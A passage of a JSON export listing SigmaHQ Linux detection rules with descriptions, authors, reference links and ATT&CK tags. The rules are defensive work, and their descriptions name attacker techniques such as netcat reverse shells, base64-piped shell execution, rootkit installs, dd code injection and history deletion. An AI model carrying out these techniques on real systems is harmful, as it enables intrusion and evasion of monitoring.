"uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", "value": "Nohup Execution" }, { "description": "Detects user account creation on ESXi system via esxcli", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-08-22", "falsepositive": [ "Legitimate administration 
activities" ], "filename": "proc_creation_lnx_esxcli_user_account_creation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml" ], "tags": [ "attack.persistence", "attack.t1136" ] }, "related": [ { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db", "value": "ESXi Account Creation Via ESXCLI" }, { "description": "Detects usage of command line tools such as \"kill\", \"pkill\" or \"killall\" to terminate or signal a running process.", "meta": { "author": "Tuan Le (NCSGroup)", "creation_date": "2023-03-16", "falsepositive": [ "Likely" ], "filename": "proc_creation_lnx_kill_process.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.cyberciti.biz/faq/how-force-kill-process-linux/", "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_kill_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "64c41342-6b27-523b-5d3f-c265f3efcdb3", "value": "Terminate Linux Process Via Kill" }, { "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-05", "falsepositive": [ "Unlikely" ], "filename": 
"proc_creation_lnx_triple_cross_rootkit_install.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" ], "tags": [ "attack.defense-evasion", "attack.t1014" ] }, "related": [ { "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", "value": "Triple Cross eBPF Rootkit Install Commands" }, { "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Legitimate use of SCX RunAsProvider ExecuteScript." 
], "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/Azure/Azure-Sentinel/pull/3059", "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" ], "tags": [ "attack.privilege-escalation", "attack.initial-access", "attack.execution", "attack.t1068", "attack.t1190", "attack.t1203" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", "value": "OMIGOD SCX RunAsProvider ExecuteScript" }, { "description": "Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. 
Seen used by malware such as DarkSide and LockBit.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_storage_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html", "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f41dada5-3f56-4232-8503-3fb7f9cf2d60", "value": "ESXi Storage Information Discovery Via ESXCLI" }, { "description": "Detects the use of the env command to invoke a shell. 
This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Github operations such as ghe-backup" ], "filename": "proc_creation_lnx_env_shell_invocation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/env/#shell", "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_env_shell_invocation.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bed978f8-7f3a-432b-82c5-9286a9b3031a", "value": "Shell Invocation via Env Command - Linux" }, { "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. 
This could be a sign of a potential reverse shell setup.", "meta": { "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-07", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_netcat_reverse_shell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/", "https://man7.org/linux/man-pages/man1/ncat.1.html", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.infosecademy.com/netcat-reverse-shells/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f734ed0-4f47-46c0-837f-6ee62505abd9", "value": "Potential Netcat Reverse Shell Execution" }, { "description": "Detects setting proxy configuration", "meta": { "author": "Ömer Günal", "creation_date": "2020-06-17", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_proxy_connection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://attack.mitre.org/techniques/T1090/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "value": "Connection Proxy" }, { "description": "Detects a python process calling to the PTY module in order to spawn a 
pretty tty which could be indicative of potential reverse shell activity.\n", "meta": { "author": "Nextron Systems", "creation_date": "2022-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_python_pty_spawn.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", "value": "Python Spawning Pretty TTY Via PTY Module" }, { "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_git_clone.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml" ], "tags": [ "attack.reconnaissance", "attack.t1593.003" ] }, "related": [ { "dest-uuid": "70910fbd-58dc-4c1c-8c48-814d11fcd022", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", "value": "Suspicious Git Clone - Linux" }, { "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", 
"meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-07-26", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_base64_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/arget13/DDexec", "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", "value": "Linux Base64 Encoded Pipe to Shell" }, { "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", "meta": { "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Legitimate usage of xclip tools." 
], "filename": "proc_creation_lnx_clipboard_collection.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.packetlabs.net/posts/clipboard-data-security/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", "value": "Clipboard Collection with Xclip Tool" }, { "description": "Detects potential overwriting and deletion of a file using DD.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Any user deleting files that way." ], "filename": "proc_creation_lnx_dd_file_overwrite.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2953194b-e33c-4859-b9e8-05948c167447", "value": "DD File Overwrite" }, { "description": "Detects executions of scripts located in potentially suspicious locations such as \"/tmp\" via a shell such as \"bash\", \"sh\", etc.", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": 
"proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "30bcce26-51c5-49f2-99c8-7b59e3af36c7", "value": "Execution Of Script Located In Potentially Suspicious Directory" }, { "description": "Detects java process spawning suspicious children", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_java_children.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.tecmint.com/different-types-of-linux-shells/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", "value": "Suspicious Java Children Processes" }, { "description": "Detects common command used to enable bpf kprobes tracing", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_bpf_kprob_tracing_enabled.yml", "level": "medium", "logsource.category": "process_creation", 
"logsource.product": "linux", "refs": [ "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", "https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml" ], "tags": [ "attack.execution", "attack.defense-evasion" ] }, "uuid": "7692f583-bd30-4008-8615-75dab3f08a99", "value": "Enable BPF Kprobes Tracing" }, { "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_find_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", "value": "Potential Discovery Activity Using Find - Linux" }, { "description": "Detects the use of the \"apt\" and \"apt-get\" commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_apt_shell_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/apt-get/", 
"https://gtfobins.github.io/gtfobins/apt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_apt_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb382fd5-b454-47ea-a264-1828e4c766d6", "value": "Shell Invocation via Apt - Linux" }, { "description": "Detects a potentially suspicious execution of a process located in the '/tmp/' folder", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_execution_tmp_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "312b42b1-bded-4441-8b58-163a3af58775", "value": "Potentially Suspicious Execution From Tmp Folder" }, { "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_mount_hidepid.yml", 
"level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/", "https://blogs.blackberry.com/", "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml" ], "tags": [ "attack.credential-access", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec52985a-d024-41e3-8ff6-14169039a0b3", "value": "Mount Execution With Hidepid Parameter" }, { "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_cat_sudoers.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" ], "tags": [ "attack.reconnaissance", "attack.t1592.004" ] }, "related": [ { "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", "value": "Cat Sudoers" }, { "description": "Detects events in which a history file gets deleted, e.g. 
the ~/bash_history to remove traces of malicious activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_susp_history_delete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" ], "tags": [ "attack.impact", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", "value": "History File Deletion" }, { "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".", "meta": { "author": "Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-09", "falsepositive": [ "Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting)." 
], "filename": "proc_creation_lnx_remove_package.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command", "https://linuxhint.com/uninstall-debian-packages/", "https://linuxhint.com/uninstall_yum_package/", "https://sysdig.com/blog/mitre-defense-evasion-falco", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95d61234-7f56-465c-6f2d-b562c6fedbc4", "value": "Linux Package Uninstall" }, { "description": "Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_permission_change_admin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml" ], "tags": [ "attack.execution" ] }, "uuid": "9691f58d-92c1-4416-8bf3-2edd753ec9cf", "value": "ESXi Admin Permission Assigned To Account Via ESXCLI" }, { "description": "Detects listing of the inodes of the \"/\" directory to determine if the we are running inside of a container.", "meta": { "author": "Seth Hanford", "creation_date": "2023-08-23", "falsepositive": [ "Legitimate system administrator usage of these commands", "Some container tools or 
deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" ], "filename": "proc_creation_lnx_susp_inod_listing.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "43e26eb5-cd58-48d1-8ce9-a273f5d298d8", "value": "Potential Container Discovery Via Inodes Listing" }, { "description": "Detects command line parameters or strings often used by crypto miners", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Legitimate use of crypto miners" ], "filename": "proc_creation_lnx_crypto_mining.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" ], "tags": [ "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", "value": "Linux Crypto Mining Indicators" }, { "description": "Detects chmod targeting files in abnormal directory paths.", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-03", "falsepositive": [ "Admin changing file permissions." 
], "filename": "proc_creation_lnx_susp_chmod_directories.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222.002" ] }, "related": [ { "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", "value": "Chmod Suspicious Directory" }, { "description": "Detects the injection of code by overwriting the memory map of a Linux process using the \"dd\" Linux command.", "meta": { "author": "Joseph Kamau", "creation_date": "2023-12-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_dd_process_injection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/", "https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055.009" ] }, "related": [ { "dest-uuid": "d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4cad6c64-d6df-42d6-8dae-eb78defdc415", "value": "Potential Linux Process Code Injection Via DD Utility" }, { "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", "meta": { 
"author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_susp_recon_indicators.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" ], "tags": [ "attack.reconnaissance", "attack.t1592.004", "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", "value": "Linux Recon Indicators" }, { "description": "Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\n", "meta": { "author": "Andreas Braathen (mnemonic.io)", "creation_date": "2024-06-17", "falsepositive": [ "Legitimate use of the LocaltoNet service." 
], "filename": "net_connection_lnx_domain_localtonet_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "linux", "refs": [ "https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications", "https://localtonet.com/documents/supported-tunnels", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_domain_localtonet_tunnel.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.t1090", "attack.t1102" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 